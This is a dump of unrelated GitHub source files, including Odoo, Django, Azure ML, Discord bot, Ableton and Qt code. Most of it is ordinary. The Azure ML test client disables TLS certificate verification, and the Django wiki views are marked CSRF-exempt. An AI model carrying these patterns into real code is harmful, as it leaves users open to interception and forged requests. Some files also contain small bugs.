image_data[(y + int_q) * width + (x + int_p)] - image_data[(y - int_q) * width + (x - int_p)]\n g[x][y][0] += g_vector * int_p\n g[x][y][1] += g_vector * int_q\n\n '''\n if g_x == 0:\n g[x][y] = 90\n else:\n g[x][y] = math.degrees(math.atan(g_y / g_x))\n '''\n \n return g","repo_name":"UmiKumo/grape","sub_path":"Roscher/廃棄ソース/def_ridge2a.py","file_name":"def_ridge2a.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6521852598","text":"from odoo import models, fields, api\n\n\nclass DeliverySlot(models.Model):\n \"\"\" Model to create delivery slots\"\"\"\n _name = 'delivery.slot'\n _rec_name = 'delivery_date'\n\n delivery_date = fields.Date('Delivery Date')\n slot = fields.Many2one('slot.time', string=\"slot\")\n product_id = fields.Many2one('product.product', string=\"Product\")\n sale_order = fields.Many2one('sale.order')\n delivery_ids = fields.One2many('sale.order', 'slot_id',\n compute='_compute_sale_ids')\n delivery_limit = fields.Integer(\"Delivery Limit\", default=100)\n total_delivery = fields.Integer(\"Total No of Deliveries\",\n compute='_onchange_delivery_ids',\n stote=True)\n remaining_slots = fields.Integer(\"Available No of Deliveries\",\n compute='_onchange_total_delivery')\n active = fields.Boolean('Active', default=True)\n\n @api.onchange('delivery_ids')\n def _onchange_delivery_ids(self):\n \"\"\"sets the total deliveries of the delivery slot\"\"\"\n self.total_delivery = len(self.delivery_ids)\n\n @api.onchange('total_delivery', 'delivery_limit')\n def _onchange_total_delivery(self):\n \"\"\"Finds remaining slots for each of the delivery slot\"\"\"\n self.remaining_slots = self.delivery_limit - self.total_delivery\n if self.remaining_slots <= 
0:\n self.active = False\n\n def _compute_sale_ids(self):\n \"\"\"Computing the related sale orders of each delivery slot\"\"\"\n for rec in self:\n sale_order = self.env['sale.order'].search(\n [('slot_per_product', '=', True)])\n for order in sale_order:\n for line in order.order_line:\n if line.delivery_date == rec.delivery_date and \\\n line.slot == rec.slot:\n rec.delivery_ids = [(4, order.id)]\n\n\nclass SlotTime(models.Model):\n \"\"\"Model to create time slots\"\"\"\n _name = 'slot.time'\n\n name = fields.Char('Slot')\n slot_type = fields.Selection([('home', 'Home Hours'),\n ('office', 'Office Hours')])\n time_from = fields.Selection([\n ('0', '12:00 AM'),\n ('1', '1:00 AM'),\n ('2', '2:00 AM'),\n ('3', '3:00 AM'),\n ('4', '4:00 AM'),\n ('5', '5:00 AM'),\n ('6', '6:00 AM'),\n ('7', '7:00 AM'),\n ('8', '8:00 AM'),\n ('9', '9:00 AM'),\n ('10', '10:00 AM'),\n ('11', '11:00 AM'),\n ('12', '12:00 PM'),\n ('13', '1:00 PM'),\n ('14', '2:00 PM'),\n ('15', '3:00 PM'),\n ('16', '4:00 PM'),\n ('17', '5:00 PM'),\n ('18', '6:00 PM'),\n ('19', '7:00 PM'),\n ('20', '8:00 PM'),\n ('21', '9:00 PM'),\n ('22', '10:00 PM'),\n ('23', '11:00 PM')], string='Time From')\n time_to = fields.Selection([\n ('0', '12:00 AM'),\n ('1', '1:00 AM'),\n ('2', '2:00 AM'),\n ('3', '3:00 AM'),\n ('4', '4:00 AM'),\n ('5', '5:00 AM'),\n ('6', '6:00 AM'),\n ('7', '7:00 AM'),\n ('8', '8:00 AM'),\n ('9', '9:00 AM'),\n ('10', '10:00 AM'),\n ('11', '11:00 AM'),\n ('12', '12:00 PM'),\n ('13', '1:00 PM'),\n ('14', '2:00 PM'),\n ('15', '3:00 PM'),\n ('16', '4:00 PM'),\n ('17', '5:00 PM'),\n ('18', '6:00 PM'),\n ('19', '7:00 PM'),\n ('20', '8:00 PM'),\n ('21', '9:00 PM'),\n ('22', '10:00 PM'),\n ('23', '11:00 PM')], string='Time To')\n","repo_name":"muhsinavalappan/MyProjects","sub_path":"delivery_slot/models/delivery_slot.py","file_name":"delivery_slot.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8192600833","text":"from django.shortcuts import render\nfrom .models import Product\n\n# Create your views here.\ndef list(request):\n get_product = Product.objects\n query = request.GET.get('query','')\n if query:\n get_product = get_product.filter(name__icontains=query)\n context = {\n 'get_product' : get_product\n }\n return render(request, 'list.html', context)\n\ndef prodinfo_view(request, product_pk):\n prod = Product.objects.get(pk=product_pk)\n context = {\n 'prod': prod\n }\n return render(request, 'prodinfo.html', context)","repo_name":"cruzey/tyshop01","sub_path":"tyadmins/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30257129401","text":"from math import sqrt\n\ndef distancia_sh(pontos, n):\n pontos.sort(key=lambda x:x[0])\n return sqrt(distancia_rec_sh(pontos, 0, n-1))\n\ndef distancia_rec_sh(pontos, p, r):\n if r <= p + 2:\n return forca_bruta(pontos, p, r)\n q = (p + r)//2\n de = distancia_rec_sh(pontos, p, q)\n dd = distancia_rec_sh(pontos, q + 1, r)\n intercale(pontos, p, q, r)\n return combine(pontos, pontos[q][0], p, r, de, dd)\n\ndef forca_bruta(pontos, p, r):\n dist2 = 100000000\n brute = pontos[p:r+1]\n brute.sort(key=lambda x:x[1])\n\n for i in range(p, r+1):\n pontos[i] = brute[i-p]\n\n for i in range(p, r+1):\n for j in range(i+1, r+1):\n aux = distancia2(pontos[i], pontos[j])\n if aux < dist2:\n dist2 = aux\n return dist2\n\ndef distancia2(a, b):\n return (b[0] - 
a[0])**2 + (b[1] - a[1])**2\n\ndef intercale(pontos, p, q, r):\n i = p \n j = q + 1\n intercalado = []\n\n while i <= q and j <= r:\n while i <= q and pontos[i][1] <= pontos[j][1]:\n intercalado.append(pontos[i])\n i += 1\n\n while j <= r and pontos[j][1] <= pontos[i][1]:\n intercalado.append(pontos[j])\n j += 1\n \n while i <= q:\n intercalado.append(pontos[i])\n i += 1\n\n while j <= r:\n intercalado.append(pontos[j])\n j += 1\n \n for i in range(p, r+1):\n pontos[i] = intercalado[i-p]\n\ndef combine(pontos, x, p, r, de, dd):\n d = min(de,dd)\n (f,t) = candidatos(pontos, x, p, r, d)\n for i in range(t):\n for j in range(i+1, min(i+7, t)):\n dlinha = distancia2(f[i], f[j])\n if dlinha < d:\n d = dlinha\n return d\n\ndef candidatos(pontos, x, p, r, d):\n t = 0\n f = []\n for k in range(p, r+1):\n if abs(x - pontos[k][0]) * abs(x - pontos[k][0]) < d:\n f.append(pontos[k])\n t += 1\n return f, t\n\ndef main():\n n = int(input())\n while n != 0:\n pontos = []\n for i in range(n):\n coord = input().split()\n x = int(coord[0])\n y = int(coord[1])\n pontos.append((x,y))\n d = distancia_sh(pontos, n)\n if d >= 10000:\n print(\"INFINITY\")\n else: \n print(format(d, '.4f'))\n n = int(input())\n\nmain()\n","repo_name":"danigfavero/geometria-computacional","sub_path":"vjudge/closest_pair.py","file_name":"closest_pair.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39758997574","text":"# Referenced from https://gist.github.com/aallan/3d45a062f26bc425b22a17ec9c81e3b6\nimport network\nimport socket\nimport time\n\nfrom machine import Pin\n\nimport uasyncio as asyncio\n\nfrom status_display import StatusDisplay\n\nclass AsyncWebServer:\n \n def __init__(self, temp_sensor, light_sensor, wlan, background_task, background_interval_sec, status_display, port=80):\n \"\"\"\n wlan isn't used directly but can be queried for status on failure\n \"\"\"\n \n self.onboard = Pin(\"LED\", Pin.OUT, value=0)\n \n self.temp_sensor = temp_sensor\n self.light_sensor = light_sensor\n \n self.wlan = wlan\n \n self.background_task = background_task\n self.background_interval_sec = background_interval_sec\n \n self.status_display = status_display\n \n self.port = port\n \n self.host='0.0.0.0'\n \n self.template = self.read_page_template()\n \n print(f\"Server will run on wlan address {self.wlan.ifconfig()[0]} and on port {self.port}\")\n print(f\"Startup page params are {self.get_page_params()}\")\n \n def read_page_template(self, template=\"index.html\"):\n template = \"Error reading page.\"\n \n with open('index.html', 'r') as file:\n template = file.read()\n \n return template\n \n def web_page(self, params: dict):\n \n temperature = params['temperature']\n light = params['light']\n time = params['time']\n \n html = self.template.format(temperature=temperature, light=light, time=time)\n return html\n \n def get_page_params(self):\n \n temperature = self.temp_sensor.take_measurement()\n light = self.light_sensor.take_measurement()\n lt = time.localtime()\n timestamp = f\"{lt[0]}/{lt[1]}/{lt[2]} {lt[3]}:{lt[4]}:{lt[5]}\"\n \n params = {'temperature': temperature, 'light': light, 'time': timestamp}\n \n return params \n\n async def serve_client(self, reader, writer):\n print(\"Client connected\")\n request_line = await reader.readline()\n print(\"Request:\", request_line)\n # We are not interested in HTTP request headers, skip them\n while await reader.readline() != b\"\\r\\n\":\n pass\n \n params = 
self.get_page_params() \n response = self.web_page(params)\n\n writer.write('HTTP/1.0 200 OK\\r\\nContent-type: text/html\\r\\n\\r\\n')\n writer.write(response)\n\n await writer.drain()\n await writer.wait_closed()\n print(\"Client disconnected\")\n\n \"\"\"\n I hereby acknowledge the hacky arrangement of the background task hosting here\n \"\"\"\t\n async def run_server(self):\n\n print('Setting up webserver...')\n asyncio.create_task(asyncio.start_server(self.serve_client, self.host, self.port))\n while True:\n print(\"Webserver executing background task\")\n await self.background_task()\n print(\"Background task completed\")\n self.status_display.flash_all(0.25)\n await asyncio.sleep(self.background_interval_sec)\n \nif __name__ == \"__main__\":\n # local test\n\n import main\n wlan = main.connect_wifi()\n status_display = StatusDisplay(main.led_config)\n \n class MockSensor:\n def take_measurement(self):\n return {\"temperature\": 83.1, \"humidity\": 38}\n \n temp_sensor = MockSensor()\n light_sensor = MockSensor()\n \n async def say_hello():\n print(\"Hello from the background\")\n \n ws = AsyncWebServer(temp_sensor=temp_sensor, light_sensor=light_sensor, wlan=wlan, background_task=say_hello, status_display=status_display, background_interval_sec=10)\n \n try:\n asyncio.run(ws.run_server())\t\n finally:\n print(\"Shutting it down...\")\n asyncio.new_event_loop()","repo_name":"johnekent/greenhouse-iot","sub_path":"pico/async_web_server.py","file_name":"async_web_server.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19279199180","text":"#!/usr/bin/python3\n\"\"\"\n This is a module to add two integers supplied only as\n an integer or as a float.\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n A function to add two numbers.\n \"\"\"\n if type(a) not in [int, float]:\n raise TypeError(\"a must be an integer\")\n if type(b) not in [int, float]:\n raise TypeError(\"b must be an integer\")\n a, b = int(a), int(b)\n return a + b\n","repo_name":"BrightOlawale/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29923069186","text":"from cgitb import text\nimport imp\nfrom turtle import title\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse\nimport markdown\nfrom .models import WikiPage, SubTopic\nfrom .forms import NewPageForm, NewSubTopicForm\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import UpdateView\n\n\n\n\n# Create your views here.\n\n\ndef home(request):\n t = '#**hello** my *friend*'\n\n return render(request,'home.html')\n\n\ndef ViewWikiPage(request,title):\n #page = WikiPage.objects.get(title=title)\n page = get_object_or_404(WikiPage, title=title)\n page_text = page.get_text()\n # topics = page.subtopics.all()\n topics = page.subtopics.all()\n\n # for t in topics:\n # topics_text[t.title] = markdown.markdown(t.text)\n\n return render(request,'pageview.html',{'page':page,'page_text':page_text,'topics':topics})\n\n@csrf_exempt\ndef NewPage(request):\n #user = request.user\n if request.method == 'POST':\n form = NewPageForm(request.POST)\n if form.is_valid():\n page = 
form.save(commit=False)\n #page.created_by = user\n page.save()\n # return redirect('wikipage',tittle=page.title)\n return redirect('home')\n else:\n form = NewPageForm()\n return render(request,'newpage.html',{'form': form})\n\n@csrf_exempt\ndef AddSubTopic(request,title):\n user = request.user\n page = get_object_or_404(WikiPage,title = title)\n if request.method == 'POST':\n form = NewSubTopicForm(request.POST)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.created_by = user\n topic.topic = page\n topic.save()\n return redirect('wikipage',title=title)\n else:\n form = NewSubTopicForm()\n page = get_object_or_404(WikiPage, title=title)\n page_text = page.get_text()\n # topics = page.subtopics.all()\n topics = page.subtopics.all()\n return render(request, 'newtopic.html', {'form':form, 'page':page,'page_text':page_text,'topics':topics})\n\n\nclass SubTopicEdit(UpdateView):\n model = SubTopic\n fields = ('text', )\n template_name = 'edit_topic.html'\n pk_url_kwarg = 'topic_pk'\n context_object_name = 'post'\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.save()\n\n return redirect('wikipage',title=post.topic.title)","repo_name":"uprm-inso-4117-2021-2022-s2/semester-project-team-9","sub_path":"WikiRum/wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42682575650","text":"import pytest\nfrom modules.accounts.application.interfaces import IClientRepository\nfrom modules.accounts.domain.models import Client, Account, User\nfrom modules.accounts.application.dto import AccountDTO\nfrom modules.accounts.domain.value_objects import Currencies\nfrom typing import List, Union\nfrom decimal import Decimal\n\n\n@pytest.fixture\ndef account_fixture():\n return (\n AccountDTO(\n user_id=1,\n default_currency=Currencies.EUR,\n number=123456789012,\n balance=Decimal(\"1000.00\"),\n ),\n AccountDTO(\n user_id=2,\n default_currency=Currencies.EUR,\n number=998765432109,\n balance=Decimal(\"500.00\"),\n ),\n )\n\n\ndef id_generator():\n id = 1\n while True:\n yield id\n id += 1\n\n\nclass MockClientRepository(IClientRepository):\n _users = dict()\n _accounts = dict()\n user_id_generator = id_generator()\n acc_id_generator = id_generator()\n\n def __enter__(self) -> None:\n pass\n\n def __exit__(self, *__args):\n pass\n\n def get_user(self, user_id: int) -> Client:\n data = self._users.get(user_id)\n client: Client = Client(user=data.get(\"user\"), accounts=data.get(\"accounts\"))\n return client\n\n def get_user_list(self) -> List[User]:\n result = list()\n for record in self._users.values():\n result.append(record.get(\"user\"))\n return result\n\n def create_account(self, account: Account) -> None:\n id = next(self.acc_id_generator)\n self._accounts[id] = account\n\n def get_account_list(self, user_id: int) -> List[Account]:\n result: List[Account] = [\n record for record in self._accounts if record.user_id == user_id\n ]\n return result\n\n def get_account(self, account_id: int) -> Union[Account, None]:\n return self._accounts.get(account_id)\n\n def get_account_by_number(self, account_number: int) -> Union[Account, None]:\n try:\n acc = list(filter(lambda x: x[\"number\"] == account_number, self._accounts))[\n 0\n ]\n except IndexError:\n acc = None\n return acc\n\n def delete_account(self, acc_id: int) -> None:\n if self._accounts.get(acc_id):\n del self._accounts[acc_id]\n\n def create_user(self, client: Client) -> None:\n 
id = next(self.user_id_generator)\n client.user.id = id\n client.accounts[0].user_id = id\n self._users[id] = {\"user\": client.user, \"accounts\": client.accounts}\n\n def delete_user(self, user_id: int) -> None:\n if self._users.get(user_id):\n del self._users[user_id]\n","repo_name":"szym0nplaza/bank-site-backend","sub_path":"src/modules/accounts/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1984809763","text":"import json\nimport os\nimport ssl\nimport typing\nimport urllib.error\nimport urllib.request\n\nfrom azureml.core import Workspace, Dataset\nfrom dotenv import load_dotenv\nfrom sklearn.preprocessing import StandardScaler\n\nfrom utils import start_action, end_action\n\nload_dotenv('.env')\n\n\ndef main():\n print()\n x_samples, y_samples = fetch_n_samples(n=20)\n\n pred_samples = predict_test_samples(x_samples)\n\n pretty_print_results(pred_samples, y_samples)\n\n\ndef fetch_n_samples(n: int) -> [list, list]:\n action_text = f'Fetch first {n} samples from test set'\n start_action(action_text)\n\n workspace = Workspace(\n os.getenv('SUBSCRIPTION_ID'),\n os.getenv('RESOURCE_GROUP'),\n os.getenv('AML_WORKSPACE_NAME')\n )\n\n train = Dataset.get_by_name(workspace, name='MNIST Database - Train Partition').to_pandas_dataframe()\n test = Dataset.get_by_name(workspace, name='MNIST Database - Test Partition').to_pandas_dataframe()\n\n first_n_samples = test.loc[0:(n - 1)]\n\n x_train = train.loc[:, train.columns != 'label']\n scaler = StandardScaler().fit(x_train)\n\n x_samples = scaler.transform(\n first_n_samples.loc[:, first_n_samples.columns != 'label']\n )\n y_samples = first_n_samples['label']\n\n end_action(action_text)\n return x_samples.tolist(), y_samples.values.tolist()\n\n\ndef predict_test_samples(x_samples: list) -> typing.Optional[list]:\n action_text = 'Predicting test samples using published endpoint'\n start_action(action_text)\n\n # bypass the server certificate verification on client side\n if not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None):\n ssl._create_default_https_context = ssl._create_unverified_context\n\n data = {\"input_data\": x_samples}\n body = str.encode(json.dumps(data))\n\n request = urllib.request.Request(os.getenv('ENDPOINT_URL'), body, headers={\n 'Content-Type': 'application/json',\n 'Authorization': ('Bearer ' + os.getenv('ENDPOINT_API_KEY')),\n 'azureml-model-deployment': os.getenv('ENDPOINT_MODEL_DEPLOYMENT')\n })\n\n try:\n response = urllib.request.urlopen(request)\n end_action(action_text)\n return json.loads(response.read())\n except urllib.error.HTTPError as error:\n end_action(action_text, state='failure')\n print(f'\\nThe request failed with status code: {str(error.code)}')\n print(error.info())\n print(error.read().decode(\"utf8\", 'ignore'))\n quit(1)\n\n\ndef pretty_print_results(pred_samples, y_samples):\n print('\\n' +\n '┌───────┬────────────┐\\n' +\n '│ Label │ Prediction │\\n' +\n '├───────┼────────────┤')\n if pred_samples is not None:\n for label, prediction in zip(y_samples, pred_samples):\n success_label = '✅' if label == prediction else '❌'\n print(f'│ {label:<5} │ {prediction} │ {success_label}')\n print('└───────┴────────────┘')\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"softawaregmbh/website-blog-aml-scripts","sub_path":"src/4_test_client.py","file_name":"4_test_client.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42778256391","text":"from __future__ import with_statement\nimport Live\nfrom _Framework.ControlSurface import ControlSurface\nfrom _Framework.ControlSurfaceComponent import ControlSurfaceComponent\nfrom _Framework.SubjectSlot import subject_slot\ntry:\n from .TrackDetector import TrackDetector\nexcept ImportError:\n from TrackDetector import TrackDetector\n\n\nclass Neova(ControlSurface):\n\n\t_track_detectors = []\n\t_current_track = None\n\n\tdef __init__(self, c_instance):\n\t\tControlSurface.__init__(self, c_instance)\n\t\twith self.component_guard():\n\t\t\tself.__c_instance = c_instance\n\n\t\tself._initialize_track_detectors()\n\t\tself._current_track = self.song().view.selected_track\n\t\tself._on_current_track_devices_changed.subject = self._current_track if self._current_track else None\n\n\t\t#self._show_tracks_description()\n\t\t#self._show_track_detectors()\n\t\t\n\tdef _show_tracks_description(self):\n\t\tlog_string = \"\\n[Current Tracks]\\n\"\n\n\t\tfor track in self.song().tracks:\n\t\t\tlog_string += (\" - \" + str(track.name)\n\t\t\t\t\t\t\t\t\t + (\" | Armed\" if (track.arm == 1) else \" | Not Armed\")\n\t\t\t\t\t\t\t\t\t + \" | Devices : \" + \"-\".join([device.name for device in track.devices])\n\t\t\t\t\t\t\t\t\t + \"\\n\")\n\t\tself.log_message (log_string)\n\n\tdef _show_track_detectors(self):\n\t\tlog_string = \"\\n[Current Detectors]\\n\"\n\n\t\tfor detector in self._track_detectors:\n\t\t\tlog_string += detector.to_string() + \"\\n\"\n\t\tself.log_message (log_string)\n\n\tdef _initialize_track_detectors(self):\n\t\twith self.component_guard():\n\t\t\tdel self._track_detectors[:]\n\t\t\tfor track in self.song().tracks:\n\t\t\t\tfor device in track.devices:\n\t\t\t\t\tif device.name == \"Plume\":\n\t\t\t\t\t\tself._track_detectors.append (TrackDetector(track))\n\n\tdef _update_track_detectors(self):\n\t\twith self.component_guard():\n\t\t\tself._remove_outdated_track_detectors()\n\n\t\t\tfor track in self.song().tracks:\n\t\t\t\tself._update_arm_detector_for_track(track)\n\n\tdef _track_has_plume(self, track_to_check):\n\t\tfor device in track_to_check.devices:\n\t\t\tif device.name == \"Plume\":\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef _track_has_arm_detector(self, track_to_check):\n\t\tfor detector in self._track_detectors:\n\t\t\tif detector.track == track_to_check:\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef _get_arm_detector_for_track(self, track_to_get_detector_for):\n\t\tfor detector in self._track_detectors:\n\t\t\tif detector.track == track_to_get_detector_for:\n\t\t\t\treturn detector\n\t\treturn None\n\n\tdef _get_arm_detector_id(self, track_to_get_detector_for):\n\t\tfor id in range(len(self._track_detectors)):\n\t\t\tif self._track_detectors[id].track == track_to_get_detector_for:\n\t\t\t\treturn id\n\t\treturn -1 #default value\n\n\tdef _update_arm_detector_for_track(self, track_to_update_detector_in):\n\t\tif ((not self._track_has_arm_detector(track_to_update_detector_in)) and self._track_has_plume(track_to_update_detector_in)):\n\t\t\t# New plume track needs a detector : appends detector to the list\n\t\t\tself._track_detectors.append (TrackDetector(track_to_update_detector_in))\n\n\t\telif (self._track_has_arm_detector(track_to_update_detector_in) and (not 
self._track_has_plume(track_to_update_detector_in))):\n\t\t\t# Former plume track no longer needs a detector: removes its detector from the list\n\t\t\tid_to_remove = self._get_arm_detector_id(track_to_update_detector_in)\n\t\t\tif id_to_remove != -1:\n\t\t\t\tself._track_detectors[id_to_remove].unbind_from_track()\n\t\t\t\tdel self._track_detectors[id_to_remove]\n\n\tdef _remove_outdated_track_detectors(self):\n\t\tfor detector in self._track_detectors:\n\t\t\tif not detector.track:\n\t\t\t\tself._track_detectors.remove (detector)\n\n\tdef _on_track_list_changed(self):\n\t\tself._update_track_detectors()\n\n\tdef _on_selected_track_changed(self):\n\t\tself._current_track = self.song().view.selected_track\n\t\tself._on_current_track_devices_changed.subject = self._current_track\n\n\t\twith self.component_guard():\n\t\t\tself._update_arm_detector_for_track(self._current_track)\n\n\t@subject_slot(\"devices\")\n\tdef _on_current_track_devices_changed(self):\n\t\twith self.component_guard():\n\t\t\tself._update_arm_detector_for_track(self._current_track)","repo_name":"Enhancia/DAW-Scripts-Plume","sub_path":"Ableton Live/Neova/Neova.py","file_name":"Neova.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"30053555576","text":"image = cv2.imread('brain1.jpg')\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\npixel_values = image.reshape((-1, 3)) #2D and 3 colors\npixel_values = np.float32(pixel_values) #making the matrix float\n#print(pixel_values.shape)\n\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2) #define the criteria\n_, labels, centers = cv2.kmeans(pixel_values, 3, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS) #asking for 3 classes - black, white and grey\ncenters = np.uint8(centers)\nlabels = labels.flatten()\nfinal_image = centers[labels.flatten()]\n\nfinal_image = final_image.reshape(image.shape)\n\nplt.subplot(121)\nplt.imshow(image)\nplt.title('Original Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(122)\nplt.imshow(final_image)\nplt.title('KNN (3) Image'), plt.xticks([]), plt.yticks([])\nplt.show()\n","repo_name":"nikkithags/Detection-and-Analysis-of-Alzheimer-s-disease","sub_path":"KnnImageSegmentation.py","file_name":"KnnImageSegmentation.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"29372584833","text":"\"\"\"Utility functions.\"\"\"\n\nimport logging\nimport os\nimport sys\n\n\ndef read_file(path):\n \"\"\"Read file contents and return it as a string.\"\"\"\n if path and os.path.exists(path):\n with open(path, \"r\") as file_handle:\n data = file_handle.read()\n else:\n data = \"\"\n return data\n\n\ndef setup_logger():\n \"\"\"Set a logger up with script name logging to STDERR.\"\"\"\n logger = logging.getLogger(os.path.basename(sys.argv[0]))\n logger.addHandler(logging.StreamHandler(stream=sys.stderr))\n logger.setLevel(logging.DEBUG)\n return logger\n","repo_name":"sanjaz/lazypr","sub_path":"lazypr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"13223551811","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('', views.ProductList.as_view(), name='create_order'),\n path('', views.ViewProduct.as_view(), name='list_order'),\n path('admin/', views.AdminCreateProduct.as_view()),\n path('admin//', views.AdminManageProduct.as_view()), \n]\n","repo_name":"lawalkeyd/Ecommerce","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6669380329","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport random\n\n\nclass Giveaway:\n def __init__(self, bot):\n self.bot = bot\n self.giveaways = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n async def __local_check(self, ctx):\n return ctx.guild is not None\n\n @commands.command(aliases=[\"startgiveaway\", 'startgw'])\n @commands.has_permissions(manage_messages=True)\n async def opengiveaway(self, ctx):\n \"\"\"Opens a giveaway\n\n The bot will send a message and everyone who reacts to the message is entered. Each user can only enter once\n regardless of how many reactions they add. Each person can only host 1 giveaway at a time per guild.\n\n \"\"\"\n if ctx.guild not in self.giveaways:\n self.giveaways[ctx.guild] = {}\n message = await ctx.send(\"**Giveaway open, everyone who reacts to this message with any reaction \"\n \"is entered, each user is only counted once**\")\n self.giveaways[ctx.guild][ctx.author] = message\n elif ctx.author in self.giveaways[ctx.guild]:\n await ctx.send(\n \"I can only hold 1 giveaway per person, end your current giveaway to start a new one\")\n\n @commands.command(aliases=['stopgiveaway', 'stopgw'])\n @commands.has_permissions(manage_messages=True)\n async def closegiveaway(self, ctx):\n \"\"\"Closes the giveaway, you can only close your own giveaways. This does used for preventing further entries\"\"\"\n if ctx.author in self.giveaways[ctx.ctx.guild]:\n updated_message = await ctx.channel.get_message(self.giveaways[ctx.guild][ctx.author].id)\n entered_users = []\n for reaction in updated_message.reactions:\n users = await reaction.users().flatten()\n entered_users.extend(users)\n self.giveaways[ctx.author] = entered_users\n try:\n await updated_message.clear_reactions()\n except discord.Forbidden:\n pass\n await ctx.send(\"Giveaway closed,any reactions added now will no longer count\")\n\n @commands.command()\n @commands.has_permissions(manage_messages=True)\n async def giveawaychoose(self, ctx):\n \"\"\"Chooses from the pool of entries and announces the winner. 
You can keep using this command\"\"\"\n if ctx.author in self.giveaways[ctx.guild]:\n await ctx.send(f\"Congratulations: {random.choice(self.giveaways[ctx.author]).mention}!\")\n\n\ndef setup(bot):\n bot.add_cog(Giveaway(bot))\n","repo_name":"LucasCoderT/Iceteabot-old","sub_path":"src/discord/cogs/giveaway.py","file_name":"giveaway.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30359847051","text":"from qtpy.QtWidgets import QDataWidgetMapper, QCheckBox, QRadioButton, QSlider, QComboBox, QDial\n\n\nclass ExtDataWidgetMapper(QDataWidgetMapper):\n \"\"\"This class exists because QDataWidgetMapper doesn't map QCheckBox properly to a data model.\n The reason for this is that QDataWidgetMapper relies on its delegate (QStyledItemDelegate by\n default) to emit the signal commitData when editing is finished. Unfortunately,\n QStyledItemDelegate doesn't emit this signal for all widgets such as, for example QCheckBox\n and so we handle these widgets by manually triggering the commitData signal to emit from\n our delegate when one of these unhandled widgets updates.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def addMapping(self, widget, section, property=None):\n if isinstance(widget, (QCheckBox, QRadioButton)):\n widget.toggled.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QSlider):\n widget.valueChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QDial):\n widget.valueChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QComboBox):\n widget.currentTextChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n\n if property is not None:\n super().addMapping(widget, section, property)\n else:\n super().addMapping(widget, section)\n\n def setItemDelegate(self, delegate):\n # after calling super().setItemDelegate, we need to find all of the QCheckBox\n # widgets and connect them to the new delegate. Also we should disconnect from\n # the old one. 
